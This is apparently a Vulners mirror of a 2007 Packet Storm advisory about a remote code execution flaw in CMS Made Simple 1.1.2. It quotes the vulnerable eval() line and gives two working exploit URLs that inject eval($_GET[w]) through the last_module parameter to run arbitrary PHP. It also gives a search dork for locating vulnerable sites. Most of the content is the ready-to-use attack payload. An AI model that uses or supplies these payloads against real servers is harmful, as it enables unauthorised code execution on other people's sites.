Lucene search

cmsmade-exec.txt

🗓️ 25 Sep 2007 00:00:00Reported by irk4zType

packetstorm🔗 packetstormsecurity.com👁 23 Views

CMS Made Simple 1.1.2 Remote Code Execution Vulnerability, author [email protected]

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`# o [bug] /"*._ _ #  
# . . . .-*'` `*-.._.-'/ #  
# o o < * )) , ( #  
# . o `*-._`._(__.--*"`.\ #  
# #  
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #  
# author: [email protected] #  
# download: #  
# http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #  
# dork: "powered by CMS Made Simple version 1.1.2" #  
# greetz: cOndemned, kacper, str0ke #  
  
# code:  
  
/lib/adodb_lite/adodb-perf-module.inc.php:  
...  
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');  
...  
  
# exploit:  
  
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();  
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

25 Sep 2007 00:00Current

7.4High risk

Vulners AI Score7.4